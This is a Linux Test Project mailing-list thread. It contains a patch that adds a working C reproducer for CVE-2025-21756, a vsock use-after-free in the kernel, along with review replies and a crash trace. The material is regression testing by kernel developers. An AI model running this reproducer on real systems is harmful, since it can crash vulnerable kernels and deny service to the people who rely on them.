[LTP] [PATCH] cve: add test reproducer for cve-2025-21756

[LTP] [PATCH] cve: add test reproducer for cve-2025-21756

[Andrea Cervesato]

From: Andrea Cervesato <andrea.cervesato@suse.com>

This test is verifying kernel commit fcdd2242c023 "vsock: Keep the
binding until socket destruction" merged inside v6.14.

Beware, it will crash the system!

Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com>
---
 runtest/cve                    |  1 +
 testcases/cve/.gitignore       |  1 +
 testcases/cve/cve-2025-21756.c | 92 ++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 94 insertions(+)

diff --git a/runtest/cve b/runtest/cve
index 6d575aa2165bcd46e5ca36a07db33f69a91bd94a..c3ecd74dd9f837924b810b7b431ebb911d809966 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -92,3 +92,4 @@ cve-2020-25704 perf_event_open03
 cve-2022-0185 fsconfig03
 cve-2022-4378 cve-2022-4378
 cve-2025-38236 cve-2025-38236
+cve-2025-21756 cve-2025-21756
diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
index 8eb17ce56b01070e47917f9bb44cf146c0c5b338..dc1dad5b0d0d02a3ab57e72516c33ee7949c8431 100644
--- a/testcases/cve/.gitignore
+++ b/testcases/cve/.gitignore
@@ -14,3 +14,4 @@ cve-2022-4378
 icmp_rate_limit01
 tcindex01
 cve-2025-38236
+cve-2025-21756
diff --git a/testcases/cve/cve-2025-21756.c b/testcases/cve/cve-2025-21756.c
new file mode 100644
index 0000000000000000000000000000000000000000..7920dc716bc86456be5380d129e3a1b7d788fb83
--- /dev/null
+++ b/testcases/cve/cve-2025-21756.c
@@ -0,0 +1,92 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (c) 2025 Andrea Cervesato <andrea.cervesato@suse.com>
+ */
+
+/*\
+ * Test for CVE-2025-21756 fixed in kernel v6.14:
+ * fcdd2242c023 vsock: Keep the binding until socket destruction
+ *
+ * Reproducer based on:
+ * https://lore.kernel.org/all/20250128-vsock-transport-vs-autobind-v3-5-1cf57065b770@rbox.co/
+ *
+ * Beware, this test will crash the system.
+ */
+
+#include "tst_test.h"
+
+#if HAVE_LINUX_VM_SOCKETS_H
+
+#include "lapi/vm_sockets.h"
+
+#define MAX_PORT_RETRIES	24
+#define VMADDR_CID_NONEXISTING	42
+
+static int vsock_bind(unsigned int cid, unsigned int port, int type)
+{
+	int sock;
+
+	struct sockaddr_vm sa = {
+		.svm_family = AF_VSOCK,
+		.svm_cid = cid,
+		.svm_port = port,
+	};
+
+	sock = SAFE_SOCKET(AF_VSOCK, type, 0);
+	SAFE_BIND(sock, (struct sockaddr *)&sa, sizeof(sa));
+
+	return sock;
+}
+
+static void run(void)
+{
+	int sockets[MAX_PORT_RETRIES];
+	struct sockaddr_vm addr;
+	int socket, sock_count;
+	socklen_t alen;
+
+	socket = vsock_bind(VMADDR_CID_LOCAL, VMADDR_PORT_ANY, SOCK_SEQPACKET);
+
+	alen = sizeof(addr);
+	SAFE_GETSOCKNAME(socket, (struct sockaddr *)&addr, &alen);
+
+	for (sock_count = 0; sock_count < MAX_PORT_RETRIES; ++sock_count) {
+		sockets[sock_count] = vsock_bind(VMADDR_CID_ANY,
+				   ++addr.svm_port, SOCK_SEQPACKET);
+	}
+
+	SAFE_CLOSE(socket);
+
+	socket = SAFE_SOCKET(AF_VSOCK, SOCK_SEQPACKET, 0);
+	if (!connect(socket, (struct sockaddr *)&addr, alen))
+		tst_brk(TBROK, "Unexpected connect() #1 success");
+
+	addr.svm_cid = VMADDR_CID_NONEXISTING;
+	if (!connect(socket, (struct sockaddr *)&addr, alen))
+		tst_brk(TBROK, "Unexpected connect() #2 success");
+
+	addr.svm_cid = VMADDR_CID_LOCAL;
+	addr.svm_port = VMADDR_PORT_ANY;
+
+	/* Vulnerable system may crash now. */
+	SAFE_BIND(socket, (struct sockaddr *)&addr, alen);
+	SAFE_CLOSE(socket);
+
+	tst_res(TPASS, "System still running after socket unbinding");
+
+	while (sock_count--)
+		SAFE_CLOSE(sockets[sock_count]);
+}
+
+static struct tst_test test = {
+	.test_all = run,
+	.tags = (const struct tst_tag[]) {
+		{"linux-git", "fcdd2242c023"},
+		{"CVE", "2025-21756"},
+		{}
+	}
+};
+
+#else
+TST_TEST_TCONF("No linux/vm_sockets.h");
+#endif

---
base-commit: 2f208c00cfc4a1d7d5d957ac2b866e1248623aa6
change-id: 20250922-cve-2025-21756-e1afcda7b2d4

Best regards,
-- 
Andrea Cervesato <andrea.cervesato@suse.com>


-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

Re: [LTP] [PATCH] cve: add test reproducer for cve-2025-21756

[Cyril Hrubis]

Hi!
> +/*\
> + * Test for CVE-2025-21756 fixed in kernel v6.14:
> + * fcdd2242c023 vsock: Keep the binding until socket destruction
> + *
> + * Reproducer based on:
> + * https://lore.kernel.org/all/20250128-vsock-transport-vs-autobind-v3-5-1cf57065b770@rbox.co/
> + *
> + * Beware, this test will crash the system.
> + */
> +
> +#include "tst_test.h"
> +
> +#if HAVE_LINUX_VM_SOCKETS_H
> +
> +#include "lapi/vm_sockets.h"

Do we need the #if HAVE_LINUX_VM_SOCKETS_H if we include lapi/ fallback?

> +#define MAX_PORT_RETRIES	24
> +#define VMADDR_CID_NONEXISTING	42
> +
> +static int vsock_bind(unsigned int cid, unsigned int port, int type)
> +{
> +	int sock;
> +
> +	struct sockaddr_vm sa = {
> +		.svm_family = AF_VSOCK,
> +		.svm_cid = cid,
> +		.svm_port = port,
> +	};
> +
> +	sock = SAFE_SOCKET(AF_VSOCK, type, 0);
> +	SAFE_BIND(sock, (struct sockaddr *)&sa, sizeof(sa));

I guess that with the lapi fallback we should TCONF here on ENOSYS
instead and drop the #if at the top.

Other than that the rest looks good.

-- 
Cyril Hrubis
chrubis@suse.cz

-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

Re: [LTP] [PATCH] cve: add test reproducer for cve-2025-21756

[Andrea Cervesato via ltp]

Hi!

On 9/22/25 4:32 PM, Cyril Hrubis wrote:
> Hi!
>> +/*\
>> + * Test for CVE-2025-21756 fixed in kernel v6.14:
>> + * fcdd2242c023 vsock: Keep the binding until socket destruction
>> + *
>> + * Reproducer based on:
>> + *https://lore.kernel.org/all/20250128-vsock-transport-vs-autobind-v3-5-1cf57065b770@rbox.co/
>> + *
>> + * Beware, this test will crash the system.
>> + */
>> +
>> +#include "tst_test.h"
>> +
>> +#if HAVE_LINUX_VM_SOCKETS_H
>> +
>> +#include "lapi/vm_sockets.h"
> Do we need the #if HAVE_LINUX_VM_SOCKETS_H if we include lapi/ fallback?
Yes we do need a struct sockaddr_vm fallback definition in LTP.
>
>> +#define MAX_PORT_RETRIES	24
>> +#define VMADDR_CID_NONEXISTING	42
>> +
>> +static int vsock_bind(unsigned int cid, unsigned int port, int type)
>> +{
>> +	int sock;
>> +
>> +	struct sockaddr_vm sa = {
>> +		.svm_family = AF_VSOCK,
>> +		.svm_cid = cid,
>> +		.svm_port = port,
>> +	};
>> +
>> +	sock = SAFE_SOCKET(AF_VSOCK, type, 0);
>> +	SAFE_BIND(sock, (struct sockaddr *)&sa, sizeof(sa));
> I guess that with the lapi fallback we should TCONF here on ENOSYS
> instead and drop the #if at the top.
>
> Other than that the rest looks good.
>
> -- Cyril Hrubis chrubis@suse.cz
I just realized that the test is not always producing a system crash. I 
tested the cve inside a VM and obtained a crash _but_ the following 
dmesg error:

[    1.282984] ------------[ cut here ]------------
[    1.283509] refcount_t: underflow; use-after-free.
[    1.284049] WARNING: CPU: 4 PID: 205 at lib/refcount.c:28 
refcount_warn_saturate+0xd0/0x130
[    1.284944] Modules linked in:
[    1.285282] CPU: 4 UID: 0 PID: 205 Comm: cve-2025-21756 Tainted: G    
     W          6.13.0-virtme #43
[    1.286251] Tainted: [W]=WARN
[    1.286593] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011
[    1.287187] RIP: 0010:refcount_warn_saturate+0xd0/0x130
[    1.287751] Code: 0b 90 90 e9 62 76 75 00 80 3d 10 54 44 01 00 0f 85 
75 ff ff ff c6 05 03 54 44 01 01 90 48 c7 c7 80 c1 ca ac e8 11 be b8 ff 
90 <0f> 0b 90 90 e9 37 76 75 00 80 3d e6 53 44 01 00 0f 85 4a ff ff ff
[    1.289682] RSP: 0018:ffffb2fec051fe60 EFLAGS: 00010282
[    1.290228] RAX: 0000000000000000 RBX: ffff90f4c7e50000 RCX: 
0000000000000000
[    1.290987] RDX: 0000000000000000 RSI: ffffb2fec051fd00 RDI: 
0000000000000001
[    1.291741] RBP: ffff90f4c7e50000 R08: 00000000ffffdfff R09: 
0000000000000001
[    1.292501] R10: 00000000ffffdfff R11: ffffffffad076b20 R12: 
ffffffffac9483c0
[    1.293249] R13: 0000000000000000 R14: ffff90f4c925cf00 R15: 
0000000000000000
[    1.294017] FS:  00007f26beb6a740(0000) GS:ffff90f4feb00000(0000) 
knlGS:0000000000000000
[    1.294863] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    1.295479] CR2: 0000000000439190 CR3: 0000000007d92000 CR4: 
0000000000350ef0
[    1.296216] Call Trace:
[    1.296501]  <TASK>
[    1.296734]  ? refcount_warn_saturate+0xd0/0x130
[    1.297221]  ? __warn.cold+0xb0/0x10c
[    1.297634]  ? refcount_warn_saturate+0xd0/0x130
[    1.298118]  ? report_bug+0xd8/0x150
[    1.298536]  ? handle_bug+0x54/0x90
[    1.298959]  ? exc_invalid_op+0x17/0x70
[    1.299531]  ? asm_exc_invalid_op+0x1a/0x20
[    1.299978]  ? refcount_warn_saturate+0xd0/0x130
[    1.300523]  vsock_remove_bound+0x92/0xa0
[    1.300955]  __vsock_release+0x19a/0x1c0
[    1.301405]  vsock_release+0x32/0x50
[    1.301798]  __sock_release+0x3d/0xb0
[    1.302197]  sock_close+0x15/0x20
[    1.302584]  __fput+0xd9/0x290
[    1.302911]  __x64_sys_close+0x3c/0x80
[    1.303317]  do_syscall_64+0x9e/0x1a0
[    1.303726]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[    1.304255] RIP: 0033:0x7f26bec0503a
[    1.304655] Code: 08 03 00 00 59 5e 48 83 f8 fc 75 1e 83 e2 39 83 fa 
08 75 16 e8 15 ff ff ff 0f 1f 80 00 00 00 00 49 89 ca 48 8b 44 24 20 0f 
05 <48> 83 c4 18 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f
[    1.307800] RSP: 002b:00007ffe2f62e4e0 EFLAGS: 00000202 ORIG_RAX: 
0000000000000003
[    1.308618] RAX: ffffffffffffffda RBX: 00007ffe2f62e5ec RCX: 
00007f26bec0503a
[    1.309389] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 
0000000000000003
[    1.310143] RBP: 0000000000000003 R08: 0000000000000000 R09: 
0000000000000000
[    1.310903] R10: 0000000000000000 R11: 0000000000000202 R12: 
0000000000424038
[    1.311682] R13: 000000000000004c R14: 0000000000000000 R15: 
0000000000000000
[    1.312462]  </TASK>

[    1.312708] ---[ end trace 0000000000000000 ]---

I guess we need to verify that, if system is not crashed, we should 
check kernel messages in order to find any error. Is there a smart way 
to do it? I could parse data via FILE_LINES_SCANF() macro, but that 
would require multiple iterations. The alternative is just to parse the 
entire /dev/kmsg via read() and to find:

1. use-after-free message
2. test name after it
3. failing syscall vsock_release

WDYT? Maybe there are better ways to do it.

- Andrea

-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

Re: [LTP] [PATCH] cve: add test reproducer for cve-2025-21756

[Cyril Hrubis]

Hi!
> I guess we need to verify that, if system is not crashed, we should 
> check kernel messages in order to find any error. Is there a smart way 
> to do it? I could parse data via FILE_LINES_SCANF() macro, but that 
> would require multiple iterations. The alternative is just to parse the 
> entire /dev/kmsg via read() and to find:
> 
> 1. use-after-free message
> 2. test name after it
> 3. failing syscall vsock_release
> 
> WDYT? Maybe there are better ways to do it.

We have library functions to watch for kernel taint flags, that should
be enough to detect this.

-- 
Cyril Hrubis
chrubis@suse.cz

-- 
Mailing list info: https://lists.linux.it/listinfo/ltp